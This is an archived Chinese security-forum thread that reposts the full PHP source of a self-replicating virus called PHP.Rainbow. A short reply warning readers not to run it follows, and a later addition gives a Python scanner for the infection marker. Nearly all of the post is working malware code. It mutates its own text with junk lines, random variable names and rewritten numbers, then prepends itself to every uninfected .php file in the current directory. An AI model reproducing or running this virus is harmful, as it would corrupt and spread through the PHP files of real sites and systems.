EvilOctal Security Team Technical Discussion Group's Archiver

amxku 2006-8-14 08:05

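[Repost] PHP virus PHP.Rainbow

Source: EvilOctal Security Team (www.eviloctal.com)


[Discussion / Research / Virus] PHP virus PHP.Rainbow

  Do not test this on your own before reading the notes;

  Special statement: This post is for discussion and research only. HonestQiao has no material or moral connection to any consequences, man-made or otherwise, that result from this post, and HonestQiao accepts no responsibility for them. It has nothing to do with me, amxku, either, haha!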
[language=php]<?php // RainBow
srand((double)microtime() * 1000000);
$changevars = array(&#39;changevars&#39;, &#39;string&#39;, &#39;newcont&#39;,
   &#39;curdir&#39;, &#39;filea&#39;, &#39;victim&#39;, &#39;viccont&#39;, &#39;newvars&#39;, &#39;returnvar&#39;,
   &#39;counti&#39;, &#39;countj&#39;, &#39;trash&#39;, &#39;allcont&#39;, &#39;number&#39;, &#39;remn&#39;);
$string = strtok(fread(fopen(__FILE__, &#39;r&#39;), filesize(__FILE__)), chr(13) . chr(10));
$newcont = &#39;<?php // RainBow&#39; . chr(13) . chr(10);
while ($string && $string != &#39;?>&#39;){
   if(rand(0, 1)){
     if(rand(0, 1)){
         $newcont .= &#39;// &#39; . trash(&#39;&#39;, 0) . chr(13) . chr(10);
     }
     if(rand(0, 1)){
         $newcont .= &#39;$&#39; . trash(&#39;&#39;, 0) . &#39;=&#39; . chr(39) . trash(&#39;&#39;, 0) . chr(39) . &#39;;&#39; . chr(13) . chr(10);
     }
     if(rand(0, 1)){
         $newcont .= &#39;$&#39; . trash(&#39;&#39;, 0) . &#39;=&#39; . rand() . &#39;;&#39; . chr(13) . chr(10);
     }
   }
   $string = strtok(chr(13) . chr(10));
   if($string{0} != &#39;/&#39; && $string{0} != &#39;$&#39;){
     $newcont .= $string . chr(13) . chr(10);
   }
}
$counti = 0;
while($changevars[$counti]){
   $newcont = str_replace($changevars[$counti++], trash(&#39;&#39;, 0), $newcont);
}
$countj = -1;
$number = &#39;&#39;;
while(++$countj < strlen($newcont)){
   if (ord($newcont{$countj}) > 47 && ord($newcont{$countj}) < 58){
     $number = $newcont{$countj};
     while(ord($newcont{++$countj}) > 47 && ord($newcont{$countj}) < 58){
         $number .= $newcont{$countj};
     }
     $remn = rand(1, 10);
     if (!rand(0, 5)){
         switch(rand(1, 3)){
         case 1:$allcont .= &#39;(&#39; . ($number - $remn) . &#39;+&#39; . $remn . &#39;)&#39;;
           break;
         case 2:$allcont .= &#39;(&#39; . ($number + $remn) . &#39;-&#39; . $remn . &#39;)&#39;;
           break;
         case 3:$allcont .= &#39;(&#39; . ($number * $remn) . &#39;/&#39; . $remn . &#39;)&#39;;
           break;
         }
     }else{
         $allcont .= $number;
     }
   }
   $allcont .= $newcont{$countj};
   $number = &#39;&#39;;
}
$curdir = opendir(&#39;.&#39;);
while($filea = readdir($curdir)){
   if(strstr($filea, &#39;.php&#39;)){
     $victim = fopen($filea, &#39;r+&#39;);
     if (!strstr(fread($victim, 25), &#39;RainBow&#39;)){
         rewind($victim);
         $viccont = fread($victim, filesize($filea));
         rewind($victim);
         fwrite($victim, $allcont . $viccont);
     }
     fclose($victim);
   }
}
closedir($curdir);
function trash($returnvar, $countj){
   do{
     $returnvar .= chr(rand(97, 122));
   }while($countj++ < rand(5, 15));
   return $returnvar;
}
?>
[/language]

bink 2007-3-29 13:06

Scary... DIR.....

Let me add one thing too... never run this code casually....
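
A defender-side check derived from the posted code, added here as an example and not part of the original thread: the code skips any file whose first 25 bytes contain `RainBow`, so the same marker identifies files that have already been modified. The names `scan_dir` and `prepended_end` are hypothetical, and treating the first line that consists solely of `?>` as the end of the prepended block is an assumption read off the posted loop.

```python
"""Added example: flag files carrying the PHP.Rainbow infection marker."""
import os

MARKER = b"RainBow"   # string the posted code looks for before touching a file
HEAD_LEN = 25         # the posted code inspects only the first 25 bytes


def prepended_end(data):
    """Offset just past the first line that is exactly '?>' (assumed end of
    the prepended block), or None when the file has no such line."""
    pos = 0
    for line in data.splitlines(keepends=True):
        pos += len(line)
        if line.strip(b"\r\n") == b"?>":
            return pos
    return None


def scan_dir(path="."):
    """Return [(filename, offset_or_None)] for marked files directly in path.

    Mirrors the posted selection logic: any name containing '.php',
    non-recursive, marker searched in the first HEAD_LEN bytes only.
    """
    hits = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if ".php" not in name or not os.path.isfile(full):
            continue
        with open(full, "rb") as fh:
            data = fh.read()
        if MARKER in data[:HEAD_LEN]:
            hits.append((name, prepended_end(data)))
    return hits


if __name__ == "__main__":
    for name, end in scan_dir("."):
        print(f"{name}: marker found, prepended block ends at byte {end}")
```

Everything after the reported offset is what the file contained before the block was prepended, so that tail is the part to compare against a known-good copy or backup.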

© 1999-2008 EvilOctal Security Team